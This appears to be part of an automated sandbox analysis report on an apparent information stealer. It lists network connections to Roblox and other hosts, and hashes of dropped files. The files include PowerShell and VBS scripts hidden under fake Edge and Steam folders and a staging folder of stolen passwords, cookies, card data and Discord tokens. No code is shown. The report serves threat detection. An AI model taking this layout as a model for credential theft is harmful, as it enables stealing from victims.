| US | 8.8.8.8:53 | 4.44.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.154.173.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.192.66.18.in-addr.arpa | udp |
| DE | 128.116.44.4:443 | www.roblox.com | udp |
| US | 8.8.8.8:53 | metrics.roblox.com | udp |
| US | 8.8.8.8:53 | apis.roblox.com | udp |
| US | 8.8.8.8:53 | roblox-api.arkoselabs.com | udp |
| DE | 128.116.44.4:443 | apis.roblox.com | tcp |
| NL | 18.239.50.59:443 | roblox-api.arkoselabs.com | tcp |
| DE | 128.116.44.4:443 | apis.roblox.com | tcp |
| US | 8.8.8.8:53 | 59.50.239.18.in-addr.arpa | udp |
| DE | 128.116.44.4:443 | apis.roblox.com | udp |
| US | 8.8.8.8:53 | locale.roblox.com | udp |
| US | 8.8.8.8:53 | apis.rbxcdn.com | udp |
| BE | 23.14.90.112:443 | css.rbxcdn.com | tcp |
| DE | 128.116.44.4:443 | locale.roblox.com | udp |
| US | 8.8.8.8:53 | auth.roblox.com | udp |
| BE | 23.14.90.81:443 | apis.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | images.rbxcdn.com | udp |
| FR | 13.32.145.6:443 | images.rbxcdn.com | tcp |
| FR | 13.32.145.6:443 | images.rbxcdn.com | tcp |
| FR | 13.32.145.6:443 | images.rbxcdn.com | tcp |
| FR | 13.32.145.6:443 | images.rbxcdn.com | tcp |
| FR | 13.32.145.6:443 | images.rbxcdn.com | tcp |
| FR | 13.32.145.6:443 | images.rbxcdn.com | tcp |
| DE | 128.116.44.4:443 | auth.roblox.com | udp |
| US | 8.8.8.8:53 | 81.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.145.32.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ecsv2.roblox.com | udp |
| DE | 128.116.44.4:443 | ecsv2.roblox.com | udp |
| DE | 128.116.44.4:443 | ecsv2.roblox.com | udp |
| US | 8.8.8.8:53 | assetgame.roblox.com | udp |
| DE | 128.116.44.4:443 | assetgame.roblox.com | udp |
| US | 8.8.8.8:53 | ncs.roblox.com | udp |
| DE | 128.116.44.4:443 | ncs.roblox.com | udp |
| DE | 128.116.44.4:443 | ncs.roblox.com | udp |
| US | 8.8.8.8:53 | realtime-signalr.roblox.com | udp |
| US | 8.8.8.8:53 | lms.roblox.com | udp |
| US | 8.8.8.8:53 | thumbnails.roblox.com | udp |
| US | 8.8.8.8:53 | contacts.roblox.com | udp |
| US | 8.8.8.8:53 | notifications.roblox.com | udp |
| US | 8.8.8.8:53 | accountsettings.roblox.com | udp |
| US | 8.8.8.8:53 | economy.roblox.com | udp |
| US | 8.8.8.8:53 | friends.roblox.com | udp |
| US | 8.8.8.8:53 | privatemessages.roblox.com | udp |
| US | 8.8.8.8:53 | trades.roblox.com | udp |
| DE | 128.116.44.4:443 | trades.roblox.com | udp |
| US | 8.8.8.8:53 | bom1-128-116-104-4.roblox.com | udp |
| US | 8.8.8.8:53 | dfw2-128-116-95-3.roblox.com | udp |
| US | 8.8.8.8:53 | sea1-128-116-115-3.roblox.com | udp |
| US | 8.8.8.8:53 | sin2-128-116-97-3.roblox.com | udp |
| US | 8.8.8.8:53 | silver.roblox.com | udp |
| US | 8.8.8.8:53 | syd1-128-116-51-3.roblox.com | udp |
| US | 8.8.8.8:53 | fra2-128-116-123-3.roblox.com | udp |
| US | 8.8.8.8:53 | cdg1-128-116-122-3.roblox.com | udp |
| US | 8.8.8.8:53 | c0aws.rbxcdn.com | udp |
| US | 8.8.8.8:53 | aws-eu-west-2a-lms.rbx.com | udp |
| DE | 128.116.44.4:443 | trades.roblox.com | udp |
| DE | 128.116.44.4:443 | trades.roblox.com | udp |
| DE | 128.116.44.4:443 | trades.roblox.com | udp |
| DE | 128.116.44.4:443 | trades.roblox.com | udp |
| DE | 128.116.44.4:443 | trades.roblox.com | udp |
| DE | 128.116.44.4:443 | trades.roblox.com | udp |
| DE | 128.116.44.4:443 | trades.roblox.com | udp |
| US | 128.116.115.3:443 | sea1-128-116-115-3.roblox.com | tcp |
| IN | 128.116.104.4:443 | bom1-128-116-104-4.roblox.com | tcp |
| SG | 128.116.97.3:443 | sin2-128-116-97-3.roblox.com | tcp |
| AU | 128.116.51.3:443 | syd1-128-116-51-3.roblox.com | tcp |
| US | 128.116.95.3:443 | dfw2-128-116-95-3.roblox.com | tcp |
| DE | 18.173.187.83:443 | c0aws.rbxcdn.com | tcp |
| FR | 128.116.122.3:443 | cdg1-128-116-122-3.roblox.com | tcp |
| GB | 128.116.119.3:443 | silver.roblox.com | tcp |
| DE | 128.116.123.3:443 | fra2-128-116-123-3.roblox.com | tcp |
| GB | 18.170.155.214:443 | aws-eu-west-2a-lms.rbx.com | tcp |
| US | 8.8.8.8:53 | tr.rbxcdn.com | udp |
| AU | 128.116.51.3:443 | syd1-128-116-51-3.roblox.com | tcp |
| SG | 128.116.97.3:443 | sin2-128-116-97-3.roblox.com | tcp |
| SE | 184.31.15.64:443 | tr.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | 3.119.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.155.170.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.122.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.123.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.187.173.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.95.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.115.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.104.116.128.in-addr.arpa | udp |
| DE | 128.116.44.4:443 | trades.roblox.com | udp |
| US | 8.8.8.8:53 | presence.roblox.com | udp |
| DE | 128.116.44.4:443 | presence.roblox.com | udp |
| US | 8.8.8.8:53 | 64.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.51.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.97.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons.gcp.gvt2.com | tcp |
| GB | 216.58.213.3:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 3.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp |
| GB | 216.58.213.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | ecsv2.roblox.com | udp |
| DE | 128.116.44.4:443 | ecsv2.roblox.com | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
| MD5 | 66a65322c9d362a23cf3d3f7735d5430 |
| SHA1 | ed59f3e4b0b16b759b866ef7293d26a1512b952e |
| SHA256 | f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c |
| SHA512 | 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21 |
C:\Users\Admin\AppData\Local\Temp\temp.ps1
| MD5 | 18047e197c6820559730d01035b2955a |
| SHA1 | 277179be54bba04c0863aebd496f53b129d47464 |
| SHA256 | 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3 |
| SHA512 | 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877 |
memory/116-72-0x00007FFEDEA23000-0x00007FFEDEA25000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dw5ramhy.pnl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/116-82-0x000001C9A1560000-0x000001C9A1582000-memory.dmp
memory/116-83-0x00007FFEDEA20000-0x00007FFEDF4E1000-memory.dmp
memory/116-84-0x00007FFEDEA20000-0x00007FFEDF4E1000-memory.dmp
memory/116-85-0x000001C9A38A0000-0x000001C9A38E4000-memory.dmp
memory/116-86-0x000001C9A3CF0000-0x000001C9A3D66000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\coslunty\coslunty.0.cs
| MD5 | 7bc8de6ac8041186ed68c07205656943 |
| SHA1 | 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75 |
| SHA256 | 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697 |
| SHA512 | 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba |
\??\c:\Users\Admin\AppData\Local\Temp\coslunty\coslunty.cmdline
| MD5 | 5c77a68b2ccfc25f8c61bc3348cbcdc1 |
| SHA1 | e57180120e91327949fa4386cf048d763148c9ad |
| SHA256 | e2ad7b057524b385f1f51fafa236638d0901c549d948e6dfcedace534d95a427 |
| SHA512 | a3b5c0c0663f5abd4a3f2f5bbcda5e815e4752684a98b1576355175f763b277170ef54615440762b2735e42b56b9e3bdf1245150dc69ddf7d4c96fb1aefa9046 |
\??\c:\Users\Admin\AppData\Local\Temp\coslunty\CSC49F411F94BF644DD95F3BEBC997E183B.TMP
| MD5 | 545bb7a6e87dfe811fe1ba3801905d1a |
| SHA1 | fcf7338e3f75bcebe77945bffbdf6d82c0b1575a |
| SHA256 | a5ae48e6f6c24db7f97a71f235933d821a3b42a6d9fb973ea8eb5ea1a6e2a0c9 |
| SHA512 | a475561e14295154a6804c35c030e82408c6231155768e45cb3d34675f78f0628c1887cca1ae32180a0248272f8a699009a6e8edcb97093f54541458d4a09203 |
C:\Users\Admin\AppData\Local\Temp\RES4083.tmp
| MD5 | c970867912aca0cbe5efcdd171326ab5 |
| SHA1 | 4084d5daa294e604f426e15474bb8021cd0142d8 |
| SHA256 | 3594a71368e2d8b62368767f0c941639544d30fa909e3d8b0b03524358d9db5c |
| SHA512 | eb73ee637587f1255a6d1491e86f9b214f7881df6318c30c3fcdc9aba225dd3f402b2eb46e1f8c14933356f05ce630dabb23092b301fe3a30a82cf412b7f1558 |
memory/116-99-0x000001C9A1590000-0x000001C9A1598000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\coslunty\coslunty.dll
| MD5 | a8815eb028efb6f62f393ee532ed1b77 |
| SHA1 | 01807841597d3de419d0a086cddaa40b0802c5b0 |
| SHA256 | f01bb28ad54e61dceaa5ac69cb732d6c06557694949c644bde4f1fe1e872e294 |
| SHA512 | eccd1d8f020c1d95b98993d65297d101a047da0a9b7cff5fa480d621511b499185011f0ea41d068c5bc8016a21201995be9ee7fe8743c88abe8311678c8bd0d9 |
memory/116-103-0x00007FFEDEA20000-0x00007FFEDF4E1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3f01549ee3e4c18244797530b588dad9 |
| SHA1 | 3e87863fc06995fe4b741357c68931221d6cc0b9 |
| SHA256 | 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a |
| SHA512 | 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50 |
memory/2452-115-0x0000022B24E70000-0x0000022B24EC0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c3d0e052ba84a5a94a12f82b5523b45e |
| SHA1 | 18c9412da40f1d565c47dc150f782672a8913baa |
| SHA256 | 0937d02e49f29b26b70ae49a9709208b79a25cb2b927251e5ef2cce71942638d |
| SHA512 | 78a4c052734d4540e190e37c674302d1a234c9d83e0761b1337241519685dbe486b65a8d58919bc2e166c8a58395895fd1385b8a47f5fed4506dbf132ddfc607 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 40fac1b1cdc131cce25a068795a775f1 |
| SHA1 | a591f8ef09d8b1f60068724d21a49a43b3273121 |
| SHA256 | 02a4aa345dba123257bf2b082859ffca77a042cb9fedc66e5d2506b638d2471e |
| SHA512 | 2715f068e0e8bc128b2ed10abe3e417dcf7b8e624d974746d9b1232d5a1f3ab2d7cd8787b2a8e6f4701e732389758712bcdd0939e7d09ee6329d368b652a371f |
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | a8834c224450d76421d8e4a34b08691f |
| SHA1 | 73ed4011bc60ba616b7b81ff9c9cad82fb517c68 |
| SHA256 | 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5 |
| SHA512 | 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596 |
C:\ProgramData\edge\Updater\RunBatHidden.vbs
| MD5 | 14a9867ec0265ebf974e440fcd67d837 |
| SHA1 | ae0e43c2daf4c913f5db17f4d9197f34ab52e254 |
| SHA256 | cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1 |
| SHA512 | 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54 |
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat
| MD5 | 1c1a0b37f465f95dad89acd8f6a31416 |
| SHA1 | d48ede323bcaa629d1e26d37473aeaddec17bfdd |
| SHA256 | 2613d861e36c5ab2353854cde7ef9fc8ddd500db78fe96fdd768ddd80a739b76 |
| SHA512 | 2a1b73ae261f3a9b45f6f12dbb5f31a4666c04d476b42e9c63720dd1999665e1075507d22c79f4066d24d7ae44c0e3fa062fe8bc42f5360cf0b70bea4ecd97c6 |
\??\c:\Users\Admin\AppData\Local\Temp\lssg30o3\lssg30o3.cmdline
| MD5 | 92471d35b210f8951918e5386f9a58f0 |
| SHA1 | 7ccb321acfe8c40acffb3603e4a54a0e34342917 |
| SHA256 | a6b79720e61a59c5584bb6a45897176657315c391f8cc1ba36cd454024dffd76 |
| SHA512 | 0b0fbd56d794bbd1ed5db88a837f0ee84c7f88fd45dd9c2daa3aa412ee19a63c6d6c964cc118d5e4294f28d8596c681432e21ebb075c3b08c5e67f7469b5cea9 |
\??\c:\Users\Admin\AppData\Local\Temp\lssg30o3\lssg30o3.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
\??\c:\Users\Admin\AppData\Local\Temp\lssg30o3\CSC88193676E09C4075BE3495B5E738BB2C.TMP
| MD5 | f00da05d36794cdbd78507c7fd0d3685 |
| SHA1 | 70905cd7f5168d17577f9a6636f894dffe88b562 |
| SHA256 | fe335057214f7f5e1089fe4dcd3d31eb8fd6812305e6c5541ed71fa62d5ec709 |
| SHA512 | f250190493a37bb45bd3112f773e729c26ec7ee1c7352bc0821dbf93c3a8a951381cc21aad398c68029e7eedd2b11ec27dc9eb7933b0af4d0b5fb7a9720b42a1 |
C:\Users\Admin\AppData\Local\Temp\RES4769.tmp
| MD5 | abacb5740b484b0897d0cc9e437a3917 |
| SHA1 | ba619616dc0ce0e31a50c4b39c2f686fff2fe6c8 |
| SHA256 | 665641115163ba2f004a4b81c89c8f916bc5eea201c28920e598cd3f294581b3 |
| SHA512 | 821911e8cf3b5eaa5d493696b8d12542dae9090977d97487c1300deb3332f5eef29e9e73cf3ca67ad9ac8d3967d2d66baabd4bdf2f8fa26fc308f753a50ee71f |
memory/2600-190-0x000001E2A8700000-0x000001E2A8708000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\lssg30o3\lssg30o3.dll
| MD5 | 62244f4c03be7c72f1322ead0a0ed252 |
| SHA1 | 0d22874b3bd2769028b653dac07e2a43fe45358e |
| SHA256 | 37c320361b13068d29c680f240fa719c24e4b11f5b4ec6076e67e4cc73be0f40 |
| SHA512 | c72cb1288d00eaed4c944eb6fea36cf939df4ab1e3514484646ffbdd9584a47b02ab21bc8a39b0ccd1c7d40ad9d1acbd5a0a4a013706861877bede4002e59de3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2a869dfbde8fa83a15ff1ed19d7d4bfd |
| SHA1 | f1249a1656712b544fd4a4cef27c9b45aac7afea |
| SHA256 | 048b8d982de76b0fe7baeac01751f07c2ee1a47a1449c540fc2cc0c42c043b28 |
| SHA512 | 347bc58e2c28d5ab6c8403baf47290e6143edbab323b8ece5dba625a3dc760dd83ab4feb6be76510e160007d94d3a1f41a825c6464b37fffa5b8ddd74f3e5283 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ba169f4dcbbf147fe78ef0061a95e83b |
| SHA1 | 92a571a6eef49fff666e0f62a3545bcd1cdcda67 |
| SHA256 | 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1 |
| SHA512 | 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 17f4d5ecc1e1842edb8c17a16fd53f94 |
| SHA1 | 7efa50bc8d794a8fb001adadf00bd39791142d22 |
| SHA256 | add39b4f1b10813294ee6bfb45143828c29d7188049c39000cd498d57f151729 |
| SHA512 | 8c044cac1acbce647e84dd1ca31b1672ed5611208316d85f7c9544f1cc8b7c05fb7b989ab3286559b28bd61cd5a17ba1f4a07f5e9c0b2c25726f149ef88437d3 |
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\stolen_files.zip
| MD5 | 76cdb2bad9582d23c1f6f4d868218d6c |
| SHA1 | b04f3ee8f5e43fa3b162981b50bb72fe1acabb33 |
| SHA256 | 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85 |
| SHA512 | 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f |
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Serial-Check.txt
| MD5 | 88f6b1c98f5414d926b8bbaa1f5fd708 |
| SHA1 | 835602036888c2a72c6e18e8ec10c78a9c98fcd4 |
| SHA256 | c7fdca06ab8615d4210a01b82bd6af31d42ba215ade9fc6aea7b5be4cd69880b |
| SHA512 | 6f2261bfa35b26fc5e77abc5888c80437f021a4d838fd4a43200f8a015df771d9b2716497d73f90544079f4ee4098322234cc9e6a089dda21f56bfb40fcc0beb |
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Passwords\Passwords.txt
| MD5 | c5e74f3120dbbd446a527e785dfe6d66 |
| SHA1 | 11997c2a53d19fd20916e49411c7a61bfb590e9c |
| SHA256 | e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05 |
| SHA512 | a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f |
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Discord\discord.txt
| MD5 | 675951f6d9d75fd2c9c06b5ff547c6fd |
| SHA1 | 9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09 |
| SHA256 | 60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244 |
| SHA512 | 44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea |
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\debug.log
| MD5 | 9f308dd2bdd0ae589e27f6ee0fbcd86b |
| SHA1 | 23ef4b61dd6b94a6c63a2d826229d47a1a767efb |
| SHA256 | f1c7444261a19d09e4a719aac782fab31fdaa5cf5a3fd82297a027390841b9e1 |
| SHA512 | dab43b51f9b3c4fdf3ba98bf47f984c837e461a9102b366945119480b646816f78124fde9f485c7457d024b967f0286a3141341f8a281ec5e3da631f40b6cd2d |
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Cookies\Google_Default.txt
| MD5 | 52f6eeca74e364afa08cff3dfbc78020 |
| SHA1 | a4cd16c60c913408ab271ce55093152f1720cb09 |
| SHA256 | ac2f9384b893459910616cc3defff8ec4840236eb77a27f95a627ba54f0972a8 |
| SHA512 | a43541c954af9f424c34d7e01fdfe9f5d38af8a856dce48bc944d115df69e2c0680e2f4ab14f2212f6cbaf7a7a1b233ac788ba81a780f874dbe65ff214762f12 |
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Cards\Cards.txt
| MD5 | 8a0ed121ee275936bf62b33f840db290 |
| SHA1 | 898770c85b05670ab1450a96ea6fbd46e6310ef6 |
| SHA256 | 983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709 |
| SHA512 | 7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154 |
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Autofills\Autofills.txt
| MD5 | 2f308e49fe62fbc51aa7a9b987a630fe |
| SHA1 | 1b9277da78babd9c5e248b66ba6ab16c77b97d0b |
| SHA256 | d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521 |
| SHA512 | c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1
| MD5 | 64d2acbce1ae3728d05215c5371487e0 |
| SHA1 | a39d85baf08595104b7a8d196cfc8bbc6a7b6337 |
| SHA256 | 786d2c088da950be856cb21a6df9a5366cc37e607736809f6316e59b0c3688a0 |
| SHA512 | 920f324f62b3b33ee1c1c9ca05f7612fd77e9b0cad5464b5f1a82907c0dac899b54b7c57f4e223af605321869c8a795e588552768b33c6d7ec77265fa090c50d |
C:\ProgramData\Steam\Launcher\EN-Tmuacblb.zip
| MD5 | 35d4f466ab76739a25c28aa54607bedd |
| SHA1 | e72ac9adc72b94aa9f7b46e56f3db3e37aa1b9bb |
| SHA256 | b6483d4b7fcf5744a6c58f88446ea35022b59fe8526598048d677f3a14ec51ac |
| SHA512 | 35701c57e9bacf8ee0e1fceb03d16d7d8378435c31d07bd56c958654773b844d74131a0280089755754515e3255fd25a67e09e068c45bedb893cac59cbf4c273 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ca24df1817fa1aa670674846e5d41614 |
| SHA1 | dac66ea013bcc46d24f1ece855568187c6080eaf |
| SHA256 | 3b9d5525002b14e4b5c044e80d3035420d037b48d94a1f836c5a253df0c539db |
| SHA512 | fb1848fa381fa360171ba13e1aa15c7029ff543c806f34ae524f04bda637b48e1aa06e831843aa830173c0a218072da7f3d0bc52ce56364b888c53234a224631 |
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Screenshots\Screenshot.png
| MD5 | eb3cb58667080471f3f51571ad0b2b73 |
| SHA1 | 10a6409c643a3b45be16aa6c8a72ece21fbe3f98 |
| SHA256 | 704f1a69c2ae9cf051bc69d87e7d8f63fa89d8caa94f414f75673354558a6f36 |
| SHA512 | 4c741c1596dd2beadd23faeb9e0087996a6a35332e7aa9d12cfee89428595653d56025f9a1f46828f7e1ad1c1f4d68b5abbc18533b155647617a28917856ad14 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 235a8eb126d835efb2e253459ab8b089 |
| SHA1 | 293fbf68e6726a5a230c3a42624c01899e35a89f |
| SHA256 | 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686 |
| SHA512 | a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92 |
C:\ProgramData\Steam\Launcher\EN-TMU~1\debug.log
| MD5 | fd354c883ccb4e0d27f69e75461b26d9 |
| SHA1 | 0b8d6ce86d54c79667b3a5f30031d8c390258529 |
| SHA256 | 38ddef399d35ccb01653a2befc8beb2d0dd84a1874736458a9e4d160575f627b |
| SHA512 | cc11e56c392a3e7883f7d95845467fdcdaff13475d93241b26cd9acf8249fa04299f90f62d6ae282abf0f7506d57a82badb4e90150479908a299a8a7d0e5d725 |
\??\pipe\crashpad_1936_ZHELEHSDTFCUZMZO
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 4cde33d1661a07833ed950dbe2af9ba5 |
| SHA1 | 6cce137f635fbd842f17c612a28ea4c1d02c5eee |
| SHA256 | 26cb16521cf412011440d6d7a0303907ff58f892014e918746f113698c5eeff8 |
| SHA512 | 14e5dd5ede35210f29225f8f8eefd563837a938f32d56afb0a25deceddc2d74983ffd3d71e53112d2bb8939f8a63eed7d0d26de15f516fe800c4fe67a2ed4526 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9baf86de20d4d358e42c2c96388b0447 |
| SHA1 | 10aa56883431c3489d8254fa6c86af8403b070ec |
| SHA256 | 3f9d5ea3f34c851252af19cccb23ff34d7346e3fa4344f0dd827261e932a0771 |
| SHA512 | 91d6ebd9d8ef989a056722ae7e16ebcc4624c835dd6ff8ea51a19d1febaa9e87f13ff478f5e02688531291b57cbe0647535006c9b3f1060fe861b1ec6145c850 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | fdbeeab3d69c3518ad5aad71d6c0ab7d |
| SHA1 | 7df5dce18b805508bfac5e561ea10ee73987b1bc |
| SHA256 | 7c52872c0c19e3cfc13c772e1cae7e188aab7769c399c23b1cf87faff9a23620 |
| SHA512 | 8e52a1be56ceb1129a28f9ab945b5745757ecad0af92bcc608da597c228fcc54a6a21e34e6d9181e360c64b737e6df89de357b25dfefb1b38fba499f6aedf557 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | cac471edae59cbd172ed094029ed8f66 |
| SHA1 | 4fb394dfd98782f53c87409b38610f95aeba1baf |
| SHA256 | 94c36877ed3ff111cba3fe96b95f1619d347efde7b8a86fb46fe6aa3baba9c00 |
| SHA512 | 26342b7eff83e914135caf217f8372644b367d2f8dc4bb2dba7e8351f815babcbf1a1c2323e30baed5ab9e8984089113bbfc82451b9032903829b6a8c48f4ca7 |
